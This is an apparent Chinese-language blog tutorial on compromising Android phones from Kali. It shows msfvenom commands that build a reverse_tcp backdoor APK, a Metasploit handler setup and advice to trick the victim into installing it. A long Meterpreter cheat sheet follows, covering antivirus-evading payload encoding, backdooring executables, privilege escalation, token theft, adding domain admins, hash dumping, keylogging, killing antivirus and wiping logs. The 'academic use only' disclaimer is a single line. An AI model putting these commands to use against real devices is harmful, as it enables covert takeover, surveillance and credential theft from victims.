Kali 下对安卓手机的攻击
写在前面:本文仅限学术交流,请勿用他人实践
Kali对安卓手机的攻击(渗透)
我们首先需要确定本机IP
这很简单,对于Kali来说我们需要打开终端并键入
ifconfig
即可获取自己的IP,然后我们需要确定安卓手机也就是被攻击者的IP,只需键入
fping -g 本机IP地址/24
这时我们就能确定目标IP,这次教程主要围绕创建后门程序展开
在终端中执行:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=接收的端口 > my_backdoor.apk
将代码段中的“目标IP”改为刚刚确定的被攻击者的IP)这时就会创建一个后门程序,后缀名为.apk格式(也就是安卓的安装包格式)并发送到所指IP下的安卓系统中
接下来要启动Metasploit
这里使用以下命令
msf > use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost 目标IP
> set lport 接收端口
> exploit
也就是“点对点打击”或者是“IP对IP”
这里我用安卓的虚拟机做了渗透
通过诱导虚拟机点开后门程序即可控制手机
当安卓手机点开木马(.apk)之后我们就获得了对肉鸡的控制权
使用help查看命令:
多例如:
service apache2 startservice postgresql startmsfconsole启动1.MSF终端命令show exploit列出metasploit框架中的所有渗透攻击模块。show payloads列出metasploit框架中的所有攻击载荷。show auxiliary列出metasploit框架中的所有辅助攻击模块。search name查找metasploit框架中的所有渗透攻击和其他模块。info展示出制定渗透攻击或模块的相关信息。use name 装载一个渗透攻击或者模块。LHOST目标主机链接的IP地址。RHOST远程主机或者目标主机。set function 设置特定的配置参数。setg function 以全局方式设置特定的配置参数。show options列出某个渗透攻击或模块中所有的参数配置。show targets列出渗透攻击所支持的目标平台。set target num指定你所知道的目标的操作系统以及补丁版本类型。set payload指定想要使用的攻击载荷。show advanced 列出所有高级配置选项。set autorunscript migrate -f.在渗透攻击完成后,将自动迁移到另一个进程。check 检测目标是否对选定渗透攻击存在相应安全漏洞exploit 执行渗透攻击或模块来攻击目标。exploit -j在计划任务下进行渗透攻击(攻击将在后台进行)exploit -z渗透攻击成功后不与会话进行交互。exploit -e encoder 制定使用的攻击载荷编码方式exploit -h 列出exploit命令的帮助信息。sessions -l列出可用的交互会话(在处理多个shell时使用)sessions -l -v列出所有可用的交互会话以及会话详细信息,例如:攻击系统时使用了哪个安全漏洞。sessions -s script在所有活跃的meterpreter会话中运行一个特定的meterpreter脚本。sessions -K 杀死所有活跃的交互会话。sessions -c cmd在所有活跃的metaerpreter会话上执行一个命令。sessions -u sessionID 升级一个普通的win32shell到meterpreter shell。db_create name 创建一个数据库驱动攻击所要使用的数据库。db_nmap利用nmap并把所有扫描数据库存储到数据库中。db_autopwn -h展示出db_autopwn命令的帮助信息。db_autopwn -p -r -e 对所有发现的开放端口执行db_autopwn,攻击所有系统,并使用一个反弹式shell。db_destroy 删除当前数据库。db_destroy user:password@host:port/database使用高级选项来删除数据库。2.metapreter命令help打开帮助run scriptname运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名。sysinfo列出受控主机的系统信息。ls 列出目标主机的文件和文件夹信息。use priv加载特权提升扩展模块,来扩展meterpreter库。ps显示所有运行进程以及关联的用户账户。migrate PID迁移到一个指定的进程IDuse incognito 加载inconito功能(用来盗取目标主机的令牌或是假冒用户)list_tokens -u列出目标主机用户组的可用令牌。impersonate_token DOMAIN_NAME\\USERNAME假冒目标主机上的可用令牌。steal_token盗窃给定进程的可用令牌并进行令牌假冒。drop_token停止假冒当前的令牌。getsystem通过各种攻击向量来提升到系统用户权限。shell以所有可用令牌来运行一个交互的shell。execute -f cmd.exe -i执行cmd.exe命令并进行交互。execute -f cmd.exe -i -t以所有可用令牌来执行cmd命令。execute -f cmd.exe -i -H -t以所有可用令牌来执行cmd命令并隐藏该进程。rev2self 回到控制目标主机的初始用户账户下。reg command在目标主机注册表中进行交互,创建,删除和查询等操作。setdesktop number切换到另一个用户界面(该功能基于那些用户已登录)。screenshot对目标主机的屏幕进行截图。upload file向目标主机上传文件。download file从目标主机下载文件。keyscan_dump存储目标主机上或许的键盘记录。getprivs尽可能多的获取目标主机上的特权。uietl enable keyboard/mouse接管目标主机的键盘和鼠标。background将你当前的meterpreter shell转为后台执行。hashdump导出目标主机中的口令哈希值。use sniffer加载嗅探模块。sniffer_interfaces列出目标主机所有开放的网络接口。sniffer_dump interfaceID pcapname在目标主机上启动嗅探。sniffer_start interfaceID packet_buffer在目标主机上针对特定范围的数据包缓冲区启动嗅探。sniffer_stats interfaceID获取正在实施嗅探网络接口的统计数据sniffer_stop interfaceID停止嗅探。add_user username password -h ip在远程目标主机上添加一个用户。add_group_user “Domain Adimins”username -h ip将用户添加到目标主机的域管理员组中。clearev清除目标主机上的日志记录。timestomp修改文件属性,例如修改文件的创建时间(反取证调差)。reboot重启目标主机。3.MSFpayload命令msfpayload -hMSFpayload 的帮助信息。msfpayload windows/meterpreter/bind_tcp O列出所有可用的攻击载荷。msfpayload windows/metarpreter/bind_tcp O.列出所有windows/meterpreter/bind_tcp 下攻击载荷的配置项(任何攻击载荷都是可以配置的)。msfpayload windows/metaerpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X>payload.exe创建一个metarpreter的reverse_tcp 攻击载荷回连到192.168.1.5的443端口,将其保存为名为payload.exe的windows可执行程序。msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R>payload.ray与上面生成同样的攻击载荷,到导成原始格式的文件,该文件将在后面的MSFencode中使用。msfpayload windows/meterpreter/bind_tcp LPORT=443 C>payload.c与上面生成同样的攻击载荷,但导出成C格式的shellcode。msfpayload windows/meterpreter/bind_tcp LPORT=443 J>payload.java导出成以%u编码方式的javaScript语言字符串。4.MSFencode命令msfencode -h列出MSFencode的帮助信息。msfencode -l列出所有可用的编码器。msfencode -t(c,eif.exe,java,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)显示编码缓冲区的格式。msfencode -i payload.raw -o encoded_payload,exe -e x86/shikata_ga_nai -c 5 -t exe使用 shikata_nai编码器对payload.raw文件进行5次编码,然后导出一个名为encoded_payload.exe的文件。msfpayload windows/meterpreter/bind_tcp LPORT=443 R|msfencode -e x86/_countdown -c 5 -t raw|msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe创建一个经过多种编码格式嵌套编码的攻击载荷。msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c创建一个纯字母 数字的shellcode,由ESI寄存器指向shellcode,以C语言格式输出。5.MSFcli命令。msfcli | grep exploit仅列出渗透攻击模块。msfcli | grep exploit/windows仅列出与Windows相关的渗透攻击模块。msfcli exploit/windows/smb/msf08_067_netapi PYALOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E对172.16.32.142 发起ms08_067_netapi渗透攻击,配置了bind_tcp攻击载荷,并绑定在443端口进行监听。6.Metasploit高级忍术msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R|msfencode -x calc.exe -k -o payload.exe -c x86/shikata_ga_nai -c 7 -t exe创建一个反弹式的Meterpreter攻击载荷,回连到192.168.1.5 主机的443端口,使用calc.exe作为载荷后门程序,让载荷执行流一直运行在被攻击的应用程序中,最后生成以.shikata_ga_nai编码器编码后的攻击载荷可执行程序payload.exe。msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R|msfencode -x calc.exe -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.5主机的443端口,使用calc.exe作为载荷后门程序,不让载荷执行流一直运行在被攻击的应用程序中,同时在攻击载荷执行后也不会再目标主机上弹出任何信息。这种配置非常有用,当你通过浏览器漏洞控制了远程主机,并不想让计算机程序打开呈现在目标用户面前,同样,最后生成用.shikata_ga_nai 编码的攻击载荷程序payload.exe。msfpayload windows/meterpreter/bind_tcp LPORT=443 R|msfencode -0 payload.exe -e x86/shikata_ga_nai -c 7 exe & & msfcli multi/bandler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E创建一个raw格式的bind_tcp模式Meterpreter攻击载荷,用shikata_ga_nai编码7次,输出以payload.exe命名的windows可执行程序文件,同时启用多路监听方式进行执行。7.MSFvenom利用MSFvenom,一个集成套件,来创建和编码你的攻击载荷。msfvenom --payloadwindows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai LHOST=172.16.1.32 LPORT=443 > msf.exe[*] x86/shikata_ga_nai succeeded with size 317(iteration=1)root://opt/framework3/msf3#这一行命令就可以创建一个攻击载荷并自动产生出可执行文件格式。8.Meterpreter后渗透攻击阶段命令。在Windows主机上使用metarpreter进行提权操作。meterpreter>use privmeterpreter>getsystem从一个给定的进程ID中窃取一个域管理员组令牌,添加一个域账户,并把域账户添加到域管理员组中。meterpreter>psmeterpreter>steal_token 1784meterpreter>shellc:\windows\sysem32>user metasploit @password /ADD /DOMAINc:\windows\sysem32>net group "Domain Admins" metasploit /ADD /DOMAIN从SAM数据库中导出密码的哈希值。meterpreter>use privmeterpreter>getsystemmeterpreter>hashdump提示:在widonws 2008中,如果getsystem命令和hashdump命令抛出异常情况时,你需要迁移到一个以SYSTEM系统权限运行的进程中。自动迁移到一个独立进程。meterpreter>run migrate通过meterpreter的killav脚步来杀死目标主机运行的杀毒软件进程。meterpreter>run kallav针对一个特定的进程捕获目标主机上的键盘记录:meterpreter>psmeterpreter>migrate 1436meterpreter>kayscan_startmeterpreter>kayscan_startmeterpreter>keyscan_dumpmeterpreter>kayscan_stop使用匿名方式来假冒管理员:meterpreter>use incognitometerpreter>list_tokens -umeterpreter>use privmeterpreter>getsystemmeterpreter>list_tokens -umeterpreter>impersonate_token IHAZSECURITY\\Admininistrator查看目标主机都采取了那些防范保护措施,列出帮助菜单,关闭防火墙以及其它我们发现的保护措施。meterpreter>run getcountermeasuremeterpreter>run getcountermeasure -hmeterpreter>run getcountermeasure -d -k识别被控制的主机是否是一台虚拟机。meterpreter>run checkvm在一个meterpreter会话界面中使用cmd shell。meterpreter>shell获取目标主机的图形界面(VNC).meterpreter>run vnc使正在运行的meterpreter界面在后台运行。meterpreter>background绕过windows的用户账户控制(UAC)机制。meterpreter>run post/windows/escalate/bypassuac导出苹果OS-X系统的口令哈希值。meterpreter>run post/osx/gather/hashdump导出linux系统的口令哈希值。meterpreter>run post/linux/gather/hashdump
根据目标选择需要的行为即可。
Kali 下对安卓手机的攻击相关推荐
- uniapp,H5下,安卓手机视频播放自动全屏问题
禁止安卓手机播放自动全屏 1,需要给video标签添加禁止参数 t7-video-player-type="inline"webkit-playsinline="true ...
- linux下截取安卓手机屏幕,截取屏幕截图
屏幕截图是捕获计算机屏幕上显示内容的图像. 在您尝试向支持人员说明情况,或想在博客中添加您在计算机屏幕上看到的内容时,屏幕截图便会派上用场. 无论您使用何种操作系统,只需几步就可以截取屏幕截图. Wi ...
- 安卓手机的文件如何传到linux里去,如何在Linux下安装安卓文件传输助手
CTO练习营 | 12月3-5日,深圳,是时刻成为优良的技巧治理者了 如不雅你测验测验在 Ubuntu 下连接你的安卓手机,你也许可以尝尝 Linux 下的安卓文件传输助手. 如今,有可能一部分人想知 ...
- linux手机 电脑传文件怎么安装,如何在 Linux 下安装安卓文件传输助手
如果你尝试在 Ubuntu 下连接你的安卓手机,你也许可以试试 Linux 下的安卓文件传输助手. 本质上来说,这个应用是谷歌 macOS 版本的一个克隆.它是用 Qt 编写的,用户界面非常简洁,使得 ...
- 耳机不支持android,安卓手机为什么不能用EarPods耳机 原因分析【图解】
相信很多人都有这样的疑问,iPhone和安卓手机的耳机孔是一样的, 安卓手机为什么不能用EarPods耳机? 这是什么原因?本次在这里就给大家分析下. 安卓手机为什么不能用EarPods耳机? 目前市 ...
- kali系统支持那些手机_将kali安装到手机上作为便携式系统启动盘的方法
本文给大家带一个将kali安装到安卓手机作为系统启动盘的方法. 安装原理 需要手机端DriveDroid和电脑端Vmware,手机端一款软件DriveDroid可以将手机存储划分出来一个分区并挂载为U ...
- 安卓手机上跑_直接在电脑上浏览操作安卓手机 #效率App #scrcpy
前些时间我们介绍了坚果手机 R2 和 TNT系统. 这个方案可以让我们将手机插上屏幕,在办公桌前「假装」在使用一台桌面电脑. 虽然,火箭君知道华为等手机已经可以在自家设备中实现:手机投射到笔记本上操作 ...
- android 屏幕投射功能,安卓手机怎么投射屏幕?
手机游戏.电影十分方便,但有时候一个大屏幕会带给你更好的体验.这里分享下将安卓手机屏幕投射到大屏幕的方法,具体操作方法来了解下吧. 1.DLNA DLNA是一种资历相当老的无线投屏技术,非常常见,基本 ...
- 安卓手机还有这么多神仙玩法,关键只有少数人知道
随着"智能手机"的快速更新迭代,手机系统逐渐融入了许多实用功能:今年Android手机市场竞争相当激烈,各大手机品牌都争先恐后地向消费者展示自己的新机型.今天我就来给大家分享几个只 ...
最新文章
- 第四章:Spring项目文件上传两种方式(全解析)
- 通过命令行在Python中测试以太坊RPC客户端
- 看动画学算法之:排序-快速排序
- python网络爬虫系列(六)——数据提取 lxml模块
- Java面试之设计模式七大原则
- mysql server出现_查询各阶段时,一旦mysql server出现各种故障下的表现形式
- 教你如何用 Linux Shell脚本判断IP是否合法(多种方法)
- 大于等于0小于等于100的正数用正则表达式表示
- ContactsProvider系统源码导入配置AndroidStudio编译环境
- 导航一体机端口测试软件,导航端口查看器
- 最拼命最努力的时候(转)
- mysql 单精度和双经度_***mysql中经度纬度字段用什么存储(关于mysql的float和decimal区别)...
- 使用python制作属于自己的地铁图
- 用java实现楼层导航_楼层导航
- 台式计算机光标时不时跳动,苹果电脑打字乱跳光标怎么办?MacBook打字时光标乱跳的解决办法...
- E - The Journey of Geor Autumn(线性DP,前缀和)
- linux删除大量过期文件,linux删除大量文件的6种方法
- ftp服务器空文件夹不让删,FTP不能删除(修改)文件夹的问题?(转载)
- 什么是设备管理系统,包括哪些内容?一文读懂
- 一墙之隔-看向世界和直面速度与激情